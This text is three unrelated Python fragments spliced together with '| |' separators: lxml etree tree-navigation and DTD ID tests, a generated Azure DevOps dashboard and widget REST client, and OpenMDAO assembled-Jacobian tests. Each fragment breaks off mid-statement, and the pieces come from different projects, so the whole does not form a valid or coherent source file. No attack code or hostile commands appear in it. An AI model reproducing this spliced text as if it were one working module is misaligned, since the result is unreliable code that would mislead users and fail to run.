list(d.iterancestors('d', 'x')))
self.assertEqual(
[b, a],
list(d.iterancestors(tag=('b', '*'))))
self.assertEqual(
[b, a],
list(d.iterancestors('b', '*')))
self.assertEqual(
[b],
list(d.iterancestors(tag=('b', 'c'))))
self.assertEqual(
[b],
list(d.iterancestors('b', 'c')))
def test_iterdescendants(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[b, d, c, e],
list(a.iterdescendants()))
self.assertEqual(
[],
list(d.iterdescendants()))
def test_iterdescendants_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[],
list(a.iterdescendants('a')))
self.assertEqual(
[],
list(a.iterdescendants(tag='a')))
a2 = SubElement(e, 'a')
self.assertEqual(
[a2],
list(a.iterdescendants('a')))
self.assertEqual(
[a2],
list(c.iterdescendants('a')))
self.assertEqual(
[a2],
list(c.iterdescendants(tag='a')))
def test_iterdescendants_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[b, e],
list(a.iterdescendants(tag=('a', 'b', 'e'))))
self.assertEqual(
[b, e],
list(a.iterdescendants('a', 'b', 'e')))
a2 = SubElement(e, 'a')
self.assertEqual(
[b, a2],
list(a.iterdescendants(tag=('a', 'b'))))
self.assertEqual(
[b, a2],
list(a.iterdescendants('a', 'b')))
self.assertEqual(
[],
list(c.iterdescendants(tag=('x', 'y', 'z'))))
self.assertEqual(
[],
list(c.iterdescendants('x', 'y', 'z')))
self.assertEqual(
[b, d, c, e, a2],
list(a.iterdescendants(tag=('x', 'y', 'z', '*'))))
self.assertEqual(
[b, d, c, e, a2],
list(a.iterdescendants('x', 'y', 'z', '*')))
def test_getroottree(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
a,
a.getroottree().getroot())
self.assertEqual(
a,
b.getroottree().getroot())
self.assertEqual(
a,
d.getroottree().getroot())
def test_getnext(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
self.assertEqual(
None,
a.getnext())
self.assertEqual(
c,
b.getnext())
self.assertEqual(
None,
c.getnext())
def test_getprevious(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
None,
a.getprevious())
self.assertEqual(
b,
c.getprevious())
self.assertEqual(
None,
b.getprevious())
def test_itersiblings(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.itersiblings()))
self.assertEqual(
[c],
list(b.itersiblings()))
self.assertEqual(
[],
list(c.itersiblings()))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True)))
self.assertEqual(
[],
list(b.itersiblings(preceding=True)))
def test_itersiblings_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.itersiblings(tag='XXX')))
self.assertEqual(
[c],
list(b.itersiblings(tag='c')))
self.assertEqual(
[c],
list(b.itersiblings(tag='*')))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True, tag='b')))
self.assertEqual(
[],
list(c.itersiblings(preceding=True, tag='c')))
def test_itersiblings_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(a, 'e')
self.assertEqual(
[],
list(a.itersiblings(tag=('XXX', 'YYY'))))
self.assertEqual(
[c, e],
list(b.itersiblings(tag=('c', 'd', 'e'))))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True, tag=('b', 'b', 'c', 'd'))))
self.assertEqual(
[c, b],
list(e.itersiblings(preceding=True, tag=('c', '*'))))
def test_parseid(self):
parseid = self.etree.parseid
XML = self.etree.XML
xml_text = _bytes('''
<!DOCTYPE document [
<!ELEMENT document (h1,p)*>
<!ELEMENT h1 (#PCDATA)>
<!ATTLIST h1 myid ID #REQUIRED>
<!ELEMENT p (#PCDATA)>
<!ATTLIST p someid ID #REQUIRED>
]>
<document>
<h1 myid="chapter1">...</h1>
<p id="note1" class="note">...</p>
<p>Regular paragraph.</p>
<p xml:id="xmlid">XML:ID paragraph.</p>
<p someid="warn1" class="warning">...</p>
</document>
''')
tree, dic = parseid(BytesIO(xml_text))
root = tree.getroot()
root2 = XML(xml_text)
self.assertEqual(self._writeElement(root),
self._writeElement(root2))
expected = {
"chapter1" : root[0],
"xmlid" : root[3],
"warn1" : root[4]
}
self.assertTrue("chapter1" in dic)
self.assertTrue("warn1" in dic)
self.assertTrue("xmlid" in dic)
self._checkIDDict(dic, expected)
def test_XMLDTDID(self):
XMLDTDID = self.etree.XMLDTDID
XML = self.etree.XML
xml_text = _bytes('''
<!DOCTYPE document [
<!ELEMENT document (h1,p)*>
<!ELEMENT h1 (#PCDATA)>
<!ATTLIST h1 myid ID #REQUIRED>
<!ELEMENT p (#PCDATA)>
<!ATTLIST p someid ID #REQUIRED>
]>
<document>
<h1 myid="chapter1">...</h1>
<p id="note1" class="note">...</p>
<p>Regular paragraph.</p>
<p xml:id="xmlid">XML:ID paragraph.</p>
<p someid="warn1" class="warning">...</p>
</document>
''')
root, dic = XMLDTDID(xml_text)
root2 = XML(xml_text)
self.assertEqual(self._writeElement(root),
self._writeElement(root2))
expected = {
"chapter1" : root[0],
"xmlid" : root[3],
"warn1" : root[4]
}
self.assertTrue("chapter1" in dic)
self.assertTrue("warn1" in dic)
self.assertTrue("xmlid" in dic)
self._checkIDDict(dic, expected)
def test_XMLDTDID_empty(self):
XMLDTDID = self.etree.XMLDTDID
XML = | |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class DashboardClient(Client):
"""Dashboard
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(DashboardClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '31c84e0a-3ece-48fd-a29d-100849af99ba'
def create_dashboard(self, dashboard, team_context):
"""CreateDashboard.
[Preview API] Create the supplied dashboard.
:param :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>` dashboard: The initial state of the dashboard
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='POST',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def delete_dashboard(self, team_context, dashboard_id):
"""DeleteDashboard.
[Preview API] Delete a dashboard given its ID. This also deletes the widgets associated with this dashboard.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard to delete.
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
self._send(http_method='DELETE',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values)
def get_dashboard(self, team_context, dashboard_id):
"""GetDashboard.
[Preview API] Get a dashboard by its ID.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_dashboards(self, team_context):
"""GetDashboards.
[Preview API] Get a list of dashboards.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('DashboardGroup', response)
def replace_dashboard(self, dashboard, team_context, dashboard_id):
"""ReplaceDashboard.
[Preview API] Replace configuration for the specified dashboard. Replaces Widget list on Dashboard, only if property is supplied.
:param :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>` dashboard: The Configuration of the dashboard to replace.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard to replace.
:rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def replace_dashboards(self, group, team_context):
"""ReplaceDashboards.
[Preview API] Update the name and position of dashboards in the supplied group, and remove omitted dashboards. Does not modify dashboard content.
:param :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>` group:
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(group, 'DashboardGroup')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='5.1-preview.2',
route_values=route_values,
content=content)
return self._deserialize('DashboardGroup', response)
def create_widget(self, widget, team_context, dashboard_id):
"""CreateWidget.
[Preview API] Create a widget on the specified dashboard.
:param :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>` widget: State of the widget to add
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of dashboard the widget will be added to.
:rtype: :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='POST',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def delete_widget(self, team_context, dashboard_id, widget_id):
"""DeleteWidget.
[Preview API] Delete the specified widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard containing the widget.
:param str widget_id: ID of the widget to update.
:rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='DELETE',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_widget(self, team_context, dashboard_id, widget_id):
"""GetWidget.
[Preview API] Get the current state of the specified widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard containing the widget.
:param str widget_id: ID of the widget to read.
:rtype: :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='GET',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('Widget', response)
def get_widgets(self, team_context, dashboard_id, eTag=None):
"""GetWidgets.
[Preview API] Get widgets contained on the specified dashboard.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard to read.
:param String eTag: Dashboard Widgets Version
:rtype: :class:`<WidgetsVersionedList> <azure.devops.v5_1.dashboard.models.WidgetsVersionedList>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
response = self._send(http_method='GET',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
response_object = models.WidgetsVersionedList()
response_object.widgets = self._deserialize('[Widget]', self._unwrap_collection(response))
response_object.eTag = response.headers.get('ETag')
return response_object
def replace_widget(self, widget, team_context, dashboard_id, widget_id):
"""ReplaceWidget.
[Preview API] Override the state of the specified widget.
:param :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>` widget: State to be written for the widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
| |
prob.run_model()
of = ['con1', 'con2']
wrt = ['x', 'z']
# Make sure we don't get a size mismatch.
derivs = prob.compute_totals(of=of, wrt=wrt)
def test_assembled_jac_bad_key(self):
# this test fails if AssembledJacobian._update sets in_start with 'output' instead of 'input'
prob = Problem()
prob.model = Group(assembled_jac_type='dense')
prob.model.add_subsystem('indep', IndepVarComp('x', 1.0))
prob.model.add_subsystem('C1', ExecComp('c=a*2.0+b', a=0., b=0., c=0.))
c2 = prob.model.add_subsystem('C2', ExecComp('d=a*2.0+b+c', a=0., b=0., c=0., d=0.))
c3 = prob.model.add_subsystem('C3', ExecComp('ee=a*2.0', a=0., ee=0.))
prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.connect('indep.x', 'C1.a')
prob.model.connect('indep.x', 'C2.a')
prob.model.connect('C1.c', 'C2.b')
prob.model.connect('C2.d', 'C3.a')
prob.set_solver_print(level=0)
prob.setup()
prob.run_model()
assert_rel_error(self, prob['C3.ee'], 8.0, 0000.1)
def test_assembled_jacobian_submat_indexing_dense(self):
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 1.0)
indeps.add_output('y', 5.0)
indeps.add_output('z', 9.0)
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('y=2.0*x*x'))
G1.add_subsystem('C2', ExecComp('y=3.0*x*x'))
prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
G1.linear_solver = DirectSolver(assemble_jac=True)
# before the fix, we got bad offsets into the _ext_mtx matrix.
# to get entries in _ext_mtx, there must be at least one connection
# to an input in the system that owns the AssembledJacobian, from
# a source that is outside of that system. In this case, the 'indeps'
# system is outside of the 'G1' group which owns the AssembledJacobian.
prob.model.connect('indeps.y', 'G1.C1.x')
prob.model.connect('indeps.z', 'G1.C2.x')
prob.setup()
prob.run_model()
assert_rel_error(self, prob['G1.C1.y'], 50.0)
assert_rel_error(self, prob['G1.C2.y'], 243.0)
def test_assembled_jacobian_submat_indexing_csc(self):
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 1.0)
indeps.add_output('y', 5.0)
indeps.add_output('z', 9.0)
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('y=2.0*x*x'))
G1.add_subsystem('C2', ExecComp('y=3.0*x*x'))
# prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = DirectSolver(assemble_jac=True)
G1.linear_solver = DirectSolver(assemble_jac=True)
G1.nonlinear_solver = NewtonSolver(solve_subsystems=False)
# before the fix, we got bad offsets into the _ext_mtx matrix.
# to get entries in _ext_mtx, there must be at least one connection
# to an input in the system that owns the AssembledJacobian, from
# a source that is outside of that system. In this case, the 'indeps'
# system is outside of the 'G1' group which owns the AssembledJacobian.
prob.model.connect('indeps.y', 'G1.C1.x')
prob.model.connect('indeps.z', 'G1.C2.x')
prob.setup()
prob.run_model()
assert_rel_error(self, prob['G1.C1.y'], 50.0)
assert_rel_error(self, prob['G1.C2.y'], 243.0)
def test_declare_partial_reference(self):
# Test for a bug where declare_partials is given an array reference
# that compute also uses and could get corrupted
class Comp(ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0, shape=2)
self.add_output('y', val=1.0, shape=2)
self.val = 2 * np.ones(2)
self.rows = np.arange(2)
self.cols = np.arange(2)
self.declare_partials(
'y', 'x', val=self.val, rows=self.rows, cols=self.cols)
def compute(self, inputs, outputs):
outputs['y'][:] = 0.
np.add.at(
outputs['y'], self.rows,
self.val * inputs['x'][self.cols])
prob = Problem(model=Comp())
prob.setup()
prob.run_model()
assert_rel_error(self, prob['y'], 2 * np.ones(2))
def test_declare_partials_row_col_size_mismatch(self):
# Make sure we have clear error messages.
class Comp1(ExplicitComponent):
def setup(self):
self.add_input('x', val=np.array((2, 2)))
self.add_output('y', val=np.array((2, 2)))
self.declare_partials('y', 'x', rows=np.array([0, 1]), cols=np.array([0]))
def compute(self, inputs, outputs):
pass
class Comp2(ExplicitComponent):
def setup(self):
self.add_input('x', val=np.array((2, 2)))
self.add_output('y', val=np.array((2, 2)))
self.declare_partials('y', 'x', rows=np.array([0]), cols=np.array([0, 1]))
def compute(self, inputs, outputs):
pass
prob = Problem()
model = prob.model
model.add_subsystem('comp', Comp1())
msg = "Comp1 \(comp\): d\(y\)/d\(x\): declare_partials has been called with rows and cols, which" + \
" should be arrays of equal length, but rows is length 2 while " + \
"cols is length 1."
with self.assertRaisesRegex(RuntimeError, msg):
prob.setup()
prob = Problem()
model = prob.model
model.add_subsystem('comp', Comp2())
msg = "Comp2 \(comp\): d\(y\)/d\(x\): declare_partials has been called with rows and cols, which" + \
" should be arrays of equal length, but rows is length 1 while " + \
"cols is length 2."
with self.assertRaisesRegex(RuntimeError, msg):
prob.setup()
def test_assembled_jacobian_unsupported_cases(self):
class ParaboloidApply(ImplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
def linearize(self, inputs, outputs, jacobian):
return
def apply_linear(self, inputs, outputs, d_inputs, d_outputs, d_residuals,
mode):
d_residuals['x'] += (np.exp(outputs['x']) - 2*inputs['a']**2 * outputs['x'])*d_outputs['x']
d_residuals['x'] += (-2 * inputs['a'] * outputs['x']**2)*d_inputs['a']
# One level deep
prob = Problem()
model = prob.model = Group(assembled_jac_type='dense')
model.linear_solver = DirectSolver(assemble_jac=True)
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('p2', IndepVarComp('y', val=1.0))
model.add_subsystem('comp', ParaboloidApply())
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
prob.setup()
msg = "AssembledJacobian not supported for matrix-free subcomponent."
with self.assertRaisesRegex(Exception, msg):
prob.run_model()
# Nested
prob = Problem()
model = prob.model = Group(assembled_jac_type='dense')
model.linear_solver = DirectSolver(assemble_jac=True)
sub = model.add_subsystem('sub', Group())
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('p2', IndepVarComp('y', val=1.0))
sub.add_subsystem('comp', ParaboloidApply())
model.connect('p1.x', 'sub.comp.x')
model.connect('p2.y', 'sub.comp.y')
prob.setup()
msg = "AssembledJacobian not supported for matrix-free subcomponent."
with self.assertRaisesRegex(Exception, msg):
prob.run_model()
# Try a component that is derived from a matrix-free one
class FurtherDerived(ParaboloidApply):
def do_nothing(self):
pass
prob = Problem()
model = prob.model = Group(assembled_jac_type='dense')
model.linear_solver = DirectSolver(assemble_jac=True)
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('p2', IndepVarComp('y', val=1.0))
model.add_subsystem('comp', FurtherDerived())
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
prob.setup()
msg = "AssembledJacobian not supported for matrix-free subcomponent."
with self.assertRaisesRegex(Exception, msg):
prob.run_model()
# Make sure regular comps don't give an error.
prob = Problem()
model = prob.model = Group(assembled_jac_type='dense')
model.linear_solver = DirectSolver(assemble_jac=True)
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('p2', IndepVarComp('y', val=1.0))
model.add_subsystem('comp', Paraboloid())
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
prob.setup()
prob.final_setup()
class ParaboloidJacVec(Paraboloid):
def linearize(self, inputs, outputs, jacobian):
return
def compute_jacvec_product(self, inputs, d_inputs, d_outputs, d_residuals, mode):
d_residuals['x'] += (np.exp(outputs['x']) - 2*inputs['a']**2 * outputs['x'])*d_outputs['x']
d_residuals['x'] += (-2 * inputs['a'] * outputs['x']**2)*d_inputs['a']
# One level deep
prob = Problem()
model = prob.model = Group(assembled_jac_type='dense')
model.linear_solver = DirectSolver(assemble_jac=True)
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('p2', IndepVarComp('y', val=1.0))
model.add_subsystem('comp', ParaboloidJacVec())
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
prob.setup()
msg = "AssembledJacobian not supported for matrix-free subcomponent."
with self.assertRaisesRegex(Exception, msg):
prob.run_model()
def test_access_undeclared_subjac(self):
class Undeclared(ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=0.0)
def compute(self, inputs, outputs):
pass
def compute_partials(self, inputs, partials):
partials['y', 'x'] = 1.0
prob = Problem()
model = prob.model
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('comp', Undeclared())
model.connect('p1.x', 'comp.x')
prob.setup()
prob.run_model()
msg = 'Variable name pair \("{}", "{}"\) must first be declared.'
with self.assertRaisesRegex(KeyError, msg.format('y', 'x')):
J = prob.compute_totals(of=['comp.y'], wrt=['p1.x'])
def test_one_src_2_tgts_with_src_indices_densejac(self):
size = 4
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('z=2.0*y+3.0*x', x=np.zeros(size//2), y=np.zeros(size//2),
z=np.zeros(size//2)))
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.add_objective('G1.C1.z')
prob.model.add_design_var('indeps.x')
prob.model.connect('indeps.x', 'G1.C1.x', src_indices=[0,1])
prob.model.connect('indeps.x', 'G1.C1.y', src_indices=[2,3])
prob.setup()
prob.run_model()
J = prob.compute_totals(of=['G1.C1.z'], wrt=['indeps.x'])
assert_rel_error(self, J['G1.C1.z', 'indeps.x'], np.array([[ 3., 0., 2., 0.],
[-0., 3., 0., 2.]]), .0001)
def test_one_src_2_tgts_csc_error(self):
size = 10
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('z=2.0*y+3.0*x', x=np.zeros(size), y=np.zeros(size),
z=np.zeros(size)))
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.add_objective('G1.C1.z')
prob.model.add_design_var('indeps.x')
prob.model.connect('indeps.x', 'G1.C1.x')
prob.model.connect('indeps.x', 'G1.C1.y')
prob.setup(mode='fwd')
prob.run_model()
J = prob.compute_totals(of=['G1.C1.z'], wrt=['indeps.x'])
assert_rel_error(self, J['G1.C1.z', 'indeps.x'], np.eye(10)*5.0, .0001)
def test_dict_properties(self):
# Make sure you can use the partials variable passed to compute_partials as a dict
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp(), promotes=['*'])
indeps.add_output('x', .5)
indeps.add_output('y', 10.0)
comp = SimpleCompWithPrintPartials()
prob.model.add_subsystem('paraboloid', comp, promotes_inputs=['x', 'y'])
prob.driver = ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.model.add_design_var('x', lower=-50, upper=50)
prob.model.add_design_var('y', lower=-50, upper=50)
prob.model.add_objective('paraboloid.f_xy')
prob.setup()
prob.run_driver()
expected = [
(('paraboloid.f_xy', 'paraboloid.f_xy'),[-1.]),
(('paraboloid.f_xy', 'paraboloid.x'),[[0.]]),
(('paraboloid.f_xy', 'paraboloid.y'),[[0.]]),
]
self.assertEqual(sorted(comp.partials_name_pairs), sorted(e[0] for e in sorted(expected)))
self.assertEqual(sorted(comp.partials_name_pairs),
sorted(e[0] for e in sorted(expected)))
for act, exp in zip(
[e[1] for e in sorted(comp.partials_values)],
[e[1] for e in sorted(expected)],
):
assert_rel_error(self,act,exp, 1e-5)
class MySparseComp(ExplicitComponent):
def setup(self):
self.add_input('y', np.zeros(2))
self.add_input('x', np.zeros(2))
self.add_output('z', np.zeros(2))
# partials use sparse list format
self.declare_partials('z', 'x', rows=[0, 1], cols=[0, 1])
self.declare_partials('z', 'y', rows=[0, 1], cols=[1, 0])
def compute(self, inputs, outputs):
outputs['z'] = np.array([3.0*inputs['x'][0]**3 + 4.0*inputs['y'][1]**2,
5.0*inputs['x'][1]**2 * inputs['y'][0]])
def compute_partials(self, inputs, partials):
partials['z', 'x'] = np.array([9.0*inputs['x'][0]**2, 10.0*inputs['x'][1]*inputs['y'][0]])
partials['z', 'y'] = np.array([8.0*inputs['y'][1], 5.0*inputs['x'][1]**2])
class MyDenseComp(ExplicitComponent):
def setup(self):
self.add_input('y', np.zeros(2))
self.add_input('x', np.zeros(2))
self.add_output('z', np.zeros(2))
# partials are dense
self.declare_partials('z', 'x')
self.declare_partials('z', 'y')
def compute(self, inputs, outputs):
